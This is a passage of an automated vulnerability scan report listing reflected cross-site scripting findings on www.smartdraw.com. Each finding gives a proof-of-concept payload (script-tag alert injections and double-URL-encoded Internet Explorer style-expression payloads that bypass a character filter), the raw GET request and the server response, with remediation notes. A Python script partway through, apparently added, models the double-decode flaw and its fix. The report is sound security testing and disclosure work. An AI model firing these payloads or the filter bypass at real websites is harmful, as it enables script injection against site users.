The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dadb8"><script>alert(1)</script>9e1a39efb8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/reviews?dadb8"><script>alert(1)</script>9e1a39efb8f=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
3.159. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/product/reviews
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2401f"><script>alert(1)</script>0614465aa10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/reviews?2401f"><script>alert(1)</script>0614465aa10=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c202c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221983cde1eb1 was submitted in the REST URL parameter 1. This input was echoed as c202c"style="x:expression(alert(1))"1983cde1eb1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /productc202c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221983cde1eb1/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:44 GMT
Content-Length: 8760
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:44 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:44 GMT; path=/
Set-Cookie: ASP.NET_SessionId=yytjsqjo2ynqqa55mlvyit45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:44 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6214%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a8713ae88e0 was submitted in the REST URL parameter 1. This input was echoed as a6214"style="x:expression(alert(1))"a8713ae88e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /a6214%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a8713ae88e0/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: ASP.NET_SessionId=g5orivnknoeu3mnalqm5ky2h; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8711
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a64e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252279d9addfb9a was submitted in the REST URL parameter 2. This input was echoed as 9a64e"style="x:expression(alert(1))"79d9addfb9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/9a64e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252279d9addfb9a HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4ccossevexhpky454jv13azr; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8739
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7026%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d34dba31b1e was submitted in the REST URL parameter 2. This input was echoed as e7026"style="x:expression(alert(1))"d34dba31b1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/x22e7026%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d34dba31b1e HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:53 GMT
Content-Length: 8760
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=5ppvdnq4c02bbb55spc4py55; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:53 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.164. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/product/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 146c3"style%3d"x%3aexpression(alert(1))"5d5d2fc8c51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 146c3"style="x:expression(alert(1))"5d5d2fc8c51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/x22?146c3"style%3d"x%3aexpression(alert(1))"5d5d2fc8c51=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=uaszcl55vdwks2faid1tcq45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.165. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/product/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd65"style%3d"x%3aexpression(alert(1))"a43b560b887 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fbd65"style="x:expression(alert(1))"a43b560b887 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/x22?fbd65"style%3d"x%3aexpression(alert(1))"a43b560b887=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:38 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:38 GMT; path=/
Set-Cookie: ASP.NET_SessionId=k3dxer55b03zcg45gc2kh5b5; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80d8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b9c460ef3f1 was submitted in the REST URL parameter 2. This input was echoed as 80d8a"style="x:expression(alert(1))"b9c460ef3f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
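The following Python script is an added illustration; it is not part of the scanner's report or of the target application's code. It traces the double-encoded payload from the finding above through one and two URL-decodes, models the filter-then-decode ordering that lets the payload reach the page, and shows the remediation the report recommends: decode exactly once, validate the canonical value, and attribute-encode on output. The blacklist and allowlist patterns and the rendering functions are assumptions standing in for the application's real code, which the report does not show. The same example applies to each of the REST URL parameter findings and parameter-name findings in this section.

```python
import html
import re
import urllib.parse

# Payloads copied verbatim from the findings in this report.
DOUBLE_ENCODED_SEGMENT = (
    "80d8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b9c460ef3f1"
)
PARAM_NAME = '8d74b"><script>alert(1)</script>7dda0913f6b'

# Hypothetical character blacklist standing in for the filter the report says the
# application applies; the real filter is not shown in the report.
BLOCKED = re.compile(r'[<>"\']')

# Hypothetical allowlist for what a /specials/<segment> path component should look like.
ALLOWED_SEGMENT = re.compile(r'^[A-Za-z0-9._-]+$')


def decode_stages(raw_segment):
    """Return the value after the web server's single decode and after a second decode."""
    once = urllib.parse.unquote(raw_segment)
    twice = urllib.parse.unquote(once)
    return once, twice


def vulnerable_render(raw_segment):
    """Filter the once-decoded value, then decode again before use (the bug)."""
    once, twice = decode_stages(raw_segment)
    if BLOCKED.search(once):
        return None  # request rejected by the filter
    # The second decode runs after validation, so %2522 turns into a live quote.
    return f'<a href="/specials/{twice}">Buy</a>'


def hardened_render(raw_segment):
    """Decode exactly once, validate the canonical value, then attribute-encode it."""
    canonical = urllib.parse.unquote(raw_segment)  # no further decoding after this point
    if not ALLOWED_SEGMENT.match(canonical):
        return None
    return f'<a href="/specials/{html.escape(canonical, quote=True)}">Buy</a>'


def hardened_echo_param_name(name):
    """Attribute-encode a reflected parameter name so it cannot close the attribute."""
    return f'<input type="hidden" name="{html.escape(name, quote=True)}" value="1">'


if __name__ == "__main__":
    once, twice = decode_stages(DOUBLE_ENCODED_SEGMENT)
    print("after 1 decode :", once)
    print("after 2 decodes:", twice)
    print("vulnerable     :", vulnerable_render(DOUBLE_ENCODED_SEGMENT))
    print("single-encoded :", vulnerable_render(once))  # the filter catches this one
    print("hardened       :", hardened_render(DOUBLE_ENCODED_SEGMENT))
    print("param name     :", hardened_echo_param_name(PARAM_NAME))
```

The once-decoded value still contains no quote, angle bracket or apostrophe, which is why a filter applied at that stage passes it; only the application's own second decode produces the `"style="x:expression(alert(1))"` sequence the report shows in the response. Removing that second decode and encoding on output closes both the path-segment and parameter-name variants.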
Request
GET /specials/80d8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b9c460ef3f1/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:31 GMT
Content-Length: 8774
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gvwmqnneobzhy02artx2kqbp; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1cdd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252248d79440d3f was submitted in the REST URL parameter 2. This input was echoed as a1cdd"style="x:expression(alert(1))"48d79440d3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/a1cdd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252248d79440d3f/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=b00pwu55pf2clt55u0k5o0rq; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.168. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.smartdraw.com
Path: /specials/diagram.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d74b"><script>alert(1)</script>7dda0913f6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/diagram.asp/x22?8d74b"><script>alert(1)</script>7dda0913f6b=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
3.169. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.smartdraw.com
Path: /specials/diagram.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f932a"><script>alert(1)</script>9f207111f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/diagram.asp/x22?f932a"><script>alert(1)</script>9f207111f3=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb652%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223dd903a5e32 was submitted in the REST URL parameter 2. This input was echoed as fb652"style="x:expression(alert(1))"3dd903a5e32 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/fb652%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223dd903a5e32/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zbprv0455f2woe45n1vggnmm; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b7f6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522722649758a8 was submitted in the REST URL parameter 2. This input was echoed as 9b7f6"style="x:expression(alert(1))"722649758a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/9b7f6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522722649758a8/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=n40tt5554keayxr2thqf5345; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.172. http://www.smartdraw.com/specials/floorplans.asp/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.smartdraw.com
Path: /specials/floorplans.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be86b"><script>alert(1)</script>3870aea577b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/floorplans.asp/x22?be86b"><script>alert(1)</script>3870aea577b=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
3.173. http://www.smartdraw.com/specials/floorplans.asp/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.smartdraw.com
Path: /specials/floorplans.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43486"><script>alert(1)</script>d3e5d5a301c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/floorplans.asp/x22?43486"><script>alert(1)</script>d3e5d5a301c=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3212f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522de74a7c05db was submitted in the REST URL parameter 2. This input was echoed as 3212f"style="x:expression(alert(1))"de74a7c05db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/3212f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522de74a7c05db/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:22 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:22 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gfjqohyflklzjc3jlpnhf155; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77d5c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e0eacf7515f was submitted in the REST URL parameter 2. This input was echoed as 77d5c"style="x:expression(alert(1))"e0eacf7515f in the application's response.
